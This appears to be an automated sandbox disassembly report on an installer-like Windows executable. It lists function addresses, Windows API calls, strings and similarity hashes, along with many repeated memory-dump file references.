Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 059a6408e4ff7a7a286042baf0ba0b6777dcdd2840b1e709c5bb58eb991f2f1d
Instruction ID: bef5c4da8a9fddcda3e14ba796976a45e550bdb17cacbe877f2265ea57743fc9
Opcode Fuzzy Hash: 059a6408e4ff7a7a286042baf0ba0b6777dcdd2840b1e709c5bb58eb991f2f1d
Instruction Fuzzy Hash: 47218471904745ABCB219F68DD48F4BBFF8AF01715B048529F896E22E1D738EA04CB55

Uniqueness

Uniqueness Score: -1.00%

Function 00402685 Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,0002FC00,00000000,40000000,00000002,00000000,00000000), ref: 004026D9
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004026F5
GlobalFree.KERNEL32(?), ref: 0040272E
WriteFile.KERNEL32(?,00000000,?,?), ref: 00402740
GlobalFree.KERNEL32(00000000), ref: 00402747
CloseHandle.KERNEL32(?), ref: 0040275F
DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402773

Memory Dump Source

Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd

Similarity

API ID: Global$AllocFileFree$CloseDeleteHandleWrite
String ID:
API String ID: 3294113728-0
Opcode ID: 5f35d965983ca7f2dda12368233f325fc0b332720f8fd806657e168f369d51d1
Instruction ID: d2462f277a9bbeab74e05a3ba9edc35ed5f42c1e2e96cac32811c1f7214cd279
Opcode Fuzzy Hash: 5f35d965983ca7f2dda12368233f325fc0b332720f8fd806657e168f369d51d1
Instruction Fuzzy Hash: 47319C71C00128BBDF216FA9DD89DAE7A79EF08364F10422AF520772E0C7795C419FA9

Uniqueness

Uniqueness Score: -1.00%

Function 00404730 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040474B
GetMessagePos.USER32 ref: 00404753
ScreenToClient.USER32(?,?), ref: 0040476D
SendMessageA.USER32(?,00001111,00000000,?), ref: 0040477F
SendMessageA.USER32(?,0000110C,00000000,?), ref: 004047A5

Strings

f, xrefs: 00404781

Memory Dump Source

Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 0143edfa65d7345696b674457d3757b6620fab040ae94d4e1f917914a8284de5
Instruction ID: ad1af3c478a57eda8923b13f4794356c9ed70ebf35a35ad09a5ca660a75b0f14
Opcode Fuzzy Hash: 0143edfa65d7345696b674457d3757b6620fab040ae94d4e1f917914a8284de5
Instruction Fuzzy Hash: 16015275D40218BADB01DBA4DC45FFEBBBCAF55711F10412BBA10B72C0C7B465018BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00402B44 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B5F
MulDiv.KERNEL32(000844F0,00000064,000844F4), ref: 00402B8A
wsprintfA.USER32 ref: 00402B9A
SetWindowTextA.USER32(?,?), ref: 00402BAA
SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BBC

Strings

verifying installer: %d%%, xrefs: 00402B94

Memory Dump Source

Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 504712adeadd9352c4a14490f0cd0c9c0cfaa5826e6c2da3921648d7ab385779
Instruction ID: 93a9953827b1cdb6b1926f3dfe8af3c360bd0244c58553ac49039ba424eb549a
Opcode Fuzzy Hash: 504712adeadd9352c4a14490f0cd0c9c0cfaa5826e6c2da3921648d7ab385779
Instruction Fuzzy Hash: A8016770940208BBDF209F60DD09FAE3B79BB00304F008039FA06B92D1D7B9A951CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00401D26 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401D29
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D36
MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D45
ReleaseDC.USER32(?,00000000), ref: 00401D56
CreateFontIndirectA.GDI32(0040A7A0), ref: 00401DA1

Strings

Times New Roman, xrefs: 00401D87

Memory Dump Source

Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID: Times New Roman
API String ID: 3808545654-927190056
Opcode ID: 35d53cb6737e2db00cfcc0afea18a5e523b9ea7051ff07917f3b96452516af9d
Instruction ID: 685ed0ca33fa1d5999e3341403fc008963373260a57280c7a8a131362965c6fe
Opcode Fuzzy Hash: 35d53cb6737e2db00cfcc0afea18a5e523b9ea7051ff07917f3b96452516af9d
Instruction Fuzzy Hash: DD0162B1958340AFE7015BB09E1AB9B3F74E765305F108479F541B72E2C67854158B2B

Uniqueness

Uniqueness Score: -1.00%

Function 10001096 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 25libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,0000001F,?,100010FF), ref: 100010A5
GetProcAddress.KERNEL32(00000000), ref: 100010AC
GetCurrentProcess.KERNEL32(?,?,0000001F,?,100010FF), ref: 100010BC

Strings

kernel32, xrefs: 100010A0
IsWow64Process, xrefs: 1000109B

Memory Dump Source

Source File: 00000000.00000002.1660349596.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1660317252.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1660367794.0000000010002000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1660387960.0000000010003000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1660407195.0000000010004000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_hnTW5HdWvY.jbxd

Similarity

API ID: AddressCurrentHandleModuleProcProcess
String ID: IsWow64Process$kernel32
API String ID: 4190356694-3789238822
Opcode ID: a69420274d1fcaf7f73670a70dd50bd4e7ba031045505111d8b2d2074fed8b9d
Instruction ID: 3378e50aa8632b37a7392fd531010f74dfbca9613fe3ca790b78382dea599c52
Opcode Fuzzy Hash: a69420274d1fcaf7f73670a70dd50bd4e7ba031045505111d8b2d2074fed8b9d
Instruction Fuzzy Hash: 3FE04672902224EBFA10E7E18C48A8B3FACDB002C1B004612FA01D310DEAA4DA008AB0

Uniqueness

Uniqueness Score: -1.00%

Function 10001776 Relevance: 7.6, APIs: 5, Instructions: 50windowstringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?,74E02D70,00000000,?,?,?,?,100016CD,?,?), ref: 1000179F
OemToCharBuffA.USER32(?,?,00000000), ref: 100017A8
SendMessageA.USER32(00001004,00000000,00000000,00000000), ref: 100017C2
SendMessageA.USER32(00001007,00000000,?), ref: 100017E4
SendMessageA.USER32(00001013,?,00000000), ref: 100017F5

Memory Dump Source

Source File: 00000000.00000002.1660349596.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1660317252.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1660367794.0000000010002000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1660387960.0000000010003000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1660407195.0000000010004000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_hnTW5HdWvY.jbxd

Similarity

API ID: MessageSend$BuffCharlstrlen
String ID:
API String ID: 2682914888-0
Opcode ID: f740b4085d80ef29015cc9a1331dff64072d625cbcc2c1286d08e3d57b8dbe1a
Instruction ID: 90dde77562e541da37abdf46a141ede9779f145cd2dde5f2d943d3f32080e889
Opcode Fuzzy Hash: f740b4085d80ef29015cc9a1331dff64072d625cbcc2c1286d08e3d57b8dbe1a
Instruction Fuzzy Hash: 7E010C72910218BFEB129F94CCC49EF7BBDFB48799F10402AF600B6154D6B16D54DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00401CCC Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?), ref: 00401CD0
GetClientRect.USER32(00000000,?), ref: 00401CDD
LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401CFE
SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D0C
DeleteObject.GDI32(00000000), ref: 00401D1B

Memory Dump Source

Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 070b3579fd3ce9466ee50df54838f458f8c81f4b11fdd9c12f5c579012b0b7c6
Instruction ID: 854dc7b36677132a153458acbc54d2aec341d78ddb5050a54aa2f8e30eae251c
Opcode Fuzzy Hash: 070b3579fd3ce9466ee50df54838f458f8c81f4b11fdd9c12f5c579012b0b7c6
Instruction Fuzzy Hash: 57F062B2D04114AFE701EBA4DD88CAF77BCEB44301B004576F501F2091C7389D018B79

Uniqueness

Uniqueness Score: -1.00%

Function 0040464E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(0079E4F8,0079E4F8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,0040456E,000000DF,0000040F,00000400,00000000), ref: 004046DC
wsprintfA.USER32 ref: 004046E4
SetDlgItemTextA.USER32(?,0079E4F8), ref: 004046F7

Strings

%u.%u%s%s, xrefs: 004046C6

Memory Dump Source

Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 719c455404f5c3923e5dd32184b215a0a50f5ab94fe34a31874286de9948b614
Instruction ID: cb72ff88f5f2b4ba7204730e7c77314340c58308aab751b64ccb2cc1a1ae2234
Opcode Fuzzy Hash: 719c455404f5c3923e5dd32184b215a0a50f5ab94fe34a31874286de9948b614
Instruction Fuzzy Hash: 6D11087360013437DB0061699C46EAF376DDBC6374F14463BFA29F61D2E979AC1182E9

Uniqueness

Uniqueness Score: -1.00%

Function 004038C8 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 71COMMON

Download Yara Rule

APIs

SetWindowTextA.USER32(00000000,Profiling Setup), ref: 00403960

Strings

"C:\Users\user\Desktop\hnTW5HdWvY.exe", xrefs: 004038C9
Profiling Setup, xrefs: 0040394F
1033, xrefs: 004038CC, 004038D6, 00403947

Memory Dump Source

Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd

Similarity

API ID: TextWindow
String ID: "C:\Users\user\Desktop\hnTW5HdWvY.exe"$1033$Profiling Setup
API String ID: 530164218-2471716629
Opcode ID: dea4c58fa3443a67bbec645ebc440ad5ee741145256fcc04d26135353b68e111
Instruction ID: 7f85c913c4ad4b2c7e28f7c5eb066f69db857395fa0ea2f0da5054c576734154
Opcode Fuzzy Hash: dea4c58fa3443a67bbec645ebc440ad5ee741145256fcc04d26135353b68e111
Instruction Fuzzy Hash: 461104B5B006109FD320AF15DC809373BACEBC6356728827BE801A73E0C77DAD028B58

Uniqueness

Uniqueness Score: -1.00%

Function 0040560A Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004030B5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3410,0040327D), ref: 00405610
CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004030B5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3410,0040327D), ref: 00405619
lstrcatA.KERNEL32(?,00409014), ref: 0040562A

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 0040560A

Memory Dump Source

Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3081826266
Opcode ID: 890135f98a5a9138db31eb4b1572133a55ea61a04d2c03425938916b0e2dddc9
Instruction ID: f0a200e34b5deac35b36b8c3e513a2bba311d5b4005e9f4ea20cd842f48867ab
Opcode Fuzzy Hash: 890135f98a5a9138db31eb4b1572133a55ea61a04d2c03425938916b0e2dddc9
Instruction Fuzzy Hash: 16D0A962605D302AD2022615AC0AE8B7A68CF06305B040422F200B62A3C63C2D418BFE

Uniqueness

Uniqueness Score: -1.00%

Function 00401EDC Relevance: 6.1, APIs: 4, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401EEB
GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F09
GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F22
VerQueryValueA.VERSION(?,00409014,?,?,?,?,?,00000000), ref: 00401F3B

Part of subcall function 00405AD8: wsprintfA.USER32 ref: 00405AE5

Memory Dump Source

